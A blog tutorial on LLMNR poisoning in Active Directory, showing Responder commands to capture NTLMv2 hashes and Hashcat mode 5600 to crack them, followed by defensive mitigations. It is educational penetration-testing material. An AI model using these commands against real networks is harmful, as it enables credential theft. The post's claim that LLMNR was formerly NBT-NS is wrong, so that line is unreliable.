ABLOG
ABLOG
Active Directory

Exploring Common Active Directory Vulnerabilities and Exploits: Day 1 – LLMNR Poisoning

by |Published

What is LLMNR?

LLMNR Poisoning (Link-Local Multicast Name Resolution) is a network protocol used to identify hosts when DNS fails. It serves as a fallback mechanism and was formerly known as NBT-NS (NetBIOS Name Service).

Key Flaw

The critical flaw of LLMNR is that when it is used, an attacker can exploit the protocol to trick a victim into sending their NTLMv2 hash. By responding to name resolution requests, the attacker can capture and crack the victim’s credentials.

How It Works (Summary)

Imagine a scenario where a victim machine attempts to access a shared folder at \\hackme but mistakenly types \\hackm. Since \\hackm does not exist, the victim’s machine broadcasts a message on the network asking, “Does anyone know how to connect to \\hackm?”

If an attacker is in a man-in-the-middle (MitM) position, they can respond falsely, pretending to be the correct server. The attacker then requests the victim’s credentials. If the password is weak, the attacker can capture the NTLMv2 hash and crack it offline.

Practical Example of LLMNR Poisoning

Let’s demonstrate an LLMNR poisoning attack step by step.

1. Run Responder

Attackers might use Responder, a popular tool, to intercept name resolution requests and capture credentials when misconfigurations exist.

sudo responder -I tun0 -dwP
responder
run responder

2. An Event Occurs

A common trigger for this attack could be a user trying to log into a non-existent file share. In this case, the attacker (you) will intercept the request and pretend to provide access, tricking the victim into sending their credentials.

Once the victim connects, the attacker captures their hash.

llmnr captured hashes
captured hashes

3. Cracking Hashes

Since you have captured an NTLMv2 hash, you can use Hashcat to crack it.

First, identify the appropriate module for NTLMv2:

hashcat --help | grep NTLM

Then use module 5600 to crack the hash:

hashcat -m 5600 hashes.txt wordlist.txt

If the password is weak, you’ll be able to recover it successfully.

Mitigations

To protect against LLMNR and NBT-NS poisoning, follow these steps:

  1. Disable LLMNR:
    In Group Policy Editor, go to Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client and select “Turn OFF Multicast Name Resolution.”
  2. Disable NBT-NS:
    Navigate to Network Connections > Network Adapter Properties > TCP/IPv4 > Advanced > WINS tab and select “Disable NetBIOS over TCP/IP.”

  3. Additional Mitigations

    If disabling LLMNR/NBT-NS is not feasible, consider implementing these mitigations:

    • Enforce Network Access Control (NAC).
    • Require strong user passwords (e.g., greater than 14 characters with complexity), making it harder for attackers to crack hashes.

 

You may also like

Leave a comment

Your email address will not be published. Required fields are marked *